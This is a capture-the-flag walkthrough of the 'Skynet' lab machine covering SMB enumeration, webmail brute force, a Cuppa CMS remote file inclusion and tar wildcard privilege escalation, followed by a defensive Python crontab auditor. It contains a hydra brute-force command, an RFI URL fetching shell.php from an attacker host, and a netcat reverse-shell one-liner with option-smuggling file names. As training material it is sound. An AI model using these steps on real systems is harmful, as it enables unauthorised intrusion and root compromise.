Skynet

Difficulty: intermediate | Time: 55 min | Type: Writeup

A vulnerable Terminator themed machine

Learning Objectives

  • Enumerate Samba shares
  • Find email credentials
  • Exploit a web vulnerability (Cuppa CMS remote file inclusion)
  • Wildcard injection privesc

Skynet is a Terminator-themed machine featuring SMB enumeration, Squirrelmail exploitation, and tar wildcard injection for privilege escalation.

Walkthrough

```bash
# Step 1: Enumeration
nmap -sV TARGET_IP
# 22 SSH, 80 HTTP, 110 POP3, 139/445 SMB, 143 IMAP

# SMB enumeration
smbclient -L //TARGET_IP -N
# Found: anonymous, milesdyson, IPC$

smbclient //TARGET_IP/anonymous -N
# Download: attention.txt, logs

cat attention.txt
# Miles Dyson mentioned

cat log1.txt
# Password list!

# Step 2: Squirrelmail Brute Force
gobuster dir -u http://TARGET_IP -w /usr/share/wordlists/dirb/common.txt
# Found: /squirrelmail

hydra -l milesdyson -P log1.txt TARGET_IP http-post-form "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:Unknown user"
# Found password!

# Step 3: Email Reveals SMB Password
# Log in to squirrelmail
# Email contains: milesdyson SMB password

smbclient //TARGET_IP/milesdyson -U milesdyson
# Found: notes directory with important.txt
# Contains: hidden directory /45kra24zxs28v3yd

# Step 4: Cuppa CMS RFI
# Browse to: http://TARGET_IP/45kra24zxs28v3yd/
# Cuppa CMS - has a Remote File Inclusion vulnerability!

searchsploit cuppa
# RFI in alertConfigField.php

# Exploit (request this URL while hosting shell.php on YOUR_IP):
# http://TARGET_IP/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://YOUR_IP/shell.php

# Host the shell and catch the reverse connection

# Step 5: Tar Wildcard Privesc
cat /etc/crontab
# root runs: tar cf /home/milesdyson/backups/backup.tgz *

# In /var/www/html (or the cron target directory):
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc YOUR_IP 6666 >/tmp/f' > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > "--checkpoint=1"

# When cron runs, the shell expands tar's * into:
# tar cf backup.tgz --checkpoint=1 --checkpoint-action=exec=sh shell.sh ...

nc -lvnp 6666
# Wait for cron - root shell!
```

Tar Wildcard Injection

When tar is run with a bare * in a directory where a lower-privileged user can create files, the shell expands the glob into filenames before tar ever sees them, so files named like tar options are passed to tar as options. Since tar's --checkpoint-action=exec=cmd runs cmd, two such filenames are enough to execute a script as the user running the cron job.
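As an added example (not part of the original writeup), a small Python script that simulates what the cron job's tar receives once the shell expands the glob, and audits /etc/crontab-style lines for the unsafe pattern. The directory listing and crontab entries are constructed; the fix it recommends (a `--` end-of-options marker or a `./*` glob) is the standard one.

```python
import shlex

# Constructed listing: what a bare `*` expands to in the backup directory.
SAMPLE_DIR_LISTING = [
    "index.html",
    "shell.sh",
    "--checkpoint=1",
    "--checkpoint-action=exec=sh shell.sh",
]

# Constructed /etc/crontab entries (system format: schedule, user, command).
CRON_UNSAFE = "*/1 * * * * root tar cf /home/milesdyson/backups/backup.tgz *"
CRON_SAFE = "*/1 * * * * root tar cf /home/milesdyson/backups/backup.tgz -- ./*"

def expand_glob(names, pattern):
    """Simulate the shell expanding `*` or `./*`: sorted, dotfiles skipped."""
    prefix = "./" if pattern.startswith("./") else ""
    return [prefix + n for n in sorted(names) if not n.startswith(".")]

def build_tar_argv(names, pattern="*", end_of_options=False):
    """argv cron hands to tar after the shell has expanded the glob."""
    argv = ["tar", "cf", "/home/milesdyson/backups/backup.tgz"]
    if end_of_options:
        argv.append("--")  # everything after `--` is a member name, never an option
    return argv + expand_glob(names, pattern)

def injected_options(argv):
    """Arguments GNU tar would parse as options: any '-...' before a '--'."""
    opts = []
    for arg in argv[1:]:
        if arg == "--":
            break
        if arg.startswith("-"):
            opts.append(arg)
    return opts

def audit_cron_line(line):
    """Flag a crontab entry whose tar command globs bare names without a
    preceding '--' or './' prefix; return the finding or None."""
    fields = line.split(None, 6)  # min hour dom mon dow user command
    if len(fields) < 7:
        return None
    argv = shlex.split(fields[6])
    if "tar" not in argv:
        return None
    for i, tok in enumerate(argv):
        if tok.startswith("*") and "--" not in argv[:i]:
            return f"bare glob {tok!r} after tar: use '-- {tok}' or './{tok}'"
    return None
```

Run `audit_cron_line` over each line of a system crontab (and any backup script it calls) to find the pattern before an attacker does; `injected_options` shows why the `--` or `./*` form neutralises it.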

Knowledge Check

Quick Quiz
Question 1 of 1

What makes tar wildcard expansion dangerous?

Key Takeaways

  • SMB can reveal passwords in text files
  • Webmail may contain sensitive information
  • Hidden directories may be referenced in emails or files on shares
  • Tar wildcard injection is a powerful privesc technique